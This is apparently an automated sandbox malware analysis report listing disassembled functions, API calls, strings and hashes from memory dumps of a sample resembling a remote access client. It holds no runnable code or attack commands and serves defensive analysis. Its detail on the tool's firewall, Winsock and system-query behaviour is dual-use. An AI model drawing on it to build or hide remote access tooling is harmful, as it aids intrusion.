SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50

Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
__CxxThrowException@8.LIBCMT ref: 1100FEA2
std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF

Strings

bad cast, xrefs: 1100FE8C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92

Function 6C5E6940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6C5E6950

Part of subcall function 6C5E7BE0: _memset.LIBCMT ref: 6C5E7BFF
Part of subcall function 6C5E7BE0: _strncpy.LIBCMT ref: 6C5E7C0B

Part of subcall function 6C5DA4E0: EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
Part of subcall function 6C5DA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
Part of subcall function 6C5DA4E0: Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
Part of subcall function 6C5DA4E0: LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3

Strings

Bl^l, xrefs: 6C5E6B88
Client, xrefs: 6C5E6AE2
Channel, xrefs: 6C5E6ADD
Publish %d pending services, xrefs: 6C5E6AAF
1.2, xrefs: 6C5E6998

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$Bl^l$Channel$Client$Publish %d pending services
API String ID: 1112461860-3724619051
Opcode ID: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
Instruction ID: d7257693362b3b5800c530b124fa5055513c9b1dcfaaf5649dd297b53f66769a
Opcode Fuzzy Hash: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
Instruction Fuzzy Hash: 3551E671B04309DBDB10EA7EDC9679D37B4AB4938AF14053AC952C3E81DF30A944CB59

Function 11144BD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

nsmdir < GP_MAX, xrefs: 11144BFC
..\ctl32\util.cpp, xrefs: 11144BF7, 11144C99
FALSE || !"wrong nsmdir", xrefs: 11144C9E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5

Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
std::exception::exception.LIBCMT ref: 11107414
__CxxThrowException@8.LIBCMT ref: 11107429

Strings

Wtsapi32.dll, xrefs: 1110735E
Advapi32.dll, xrefs: 11107365

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: Advapi32.dll$Wtsapi32.dll
API String ID: 2851125068-2390547818
Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56

Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101733C
CoInitialize.OLE32(00000000), ref: 11017345
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
CoUninitialize.COMBASE ref: 110173D0

Strings

PCSystemTypeEx, xrefs: 1101737C
Win32_ComputerSystem, xrefs: 1101735D

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1

Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017252
CoInitialize.OLE32(00000000), ref: 1101725B
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
CoUninitialize.COMBASE ref: 110172E0

Strings

ChassisTypes, xrefs: 11017292
Win32_SystemEnclosure, xrefs: 11017273

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761

Function 111386B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 111386DA
GetTickCount.KERNEL32 ref: 111386E1

Strings

AutoICFConfig, xrefs: 11138700
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
DoICFConfig() OK, xrefs: 11138786
Client, xrefs: 11138705

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42

Function 6C5D9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,?,00000000), ref: 6C5D9C93
timeGetTime.WINMM(?,?,?,00000000), ref: 6C5D9CD0
Sleep.KERNEL32(00000000), ref: 6C5D9CDE
LeaveCriticalSection.KERNEL32(?), ref: 6C5D9D4F
InterlockedIncrement.KERNEL32(?), ref: 6C5D9D72

Strings

3', xrefs: 6C5D9CB2

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
String ID: 3'
API String ID: 77915721-280543908
Opcode ID: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
Instruction ID: e4615c7a9f2bfe3b499a5afee83e88e60d15619c19cca24c9eeb59424fce252b
Opcode Fuzzy Hash: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
Instruction Fuzzy Hash: 4D21CD70A042188FDB20DF68DC98B9AB3B4AF45325F164295D80E9B681CA30ED84CF95

Function 11096970 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11096984
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9

Strings

ICF Present: , xrefs: 110969E0
HNetCfg.FwMgr, xrefs: 11096999

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2

Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69

Strings

GetModuleFileNameExA, xrefs: 11025D40
GetProcessImageFileNameA, xrefs: 11025D10

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4

Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321

Strings

..\ctl32\Refcount.cpp, xrefs: 1110F2FB
hThread, xrefs: 1110F300

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
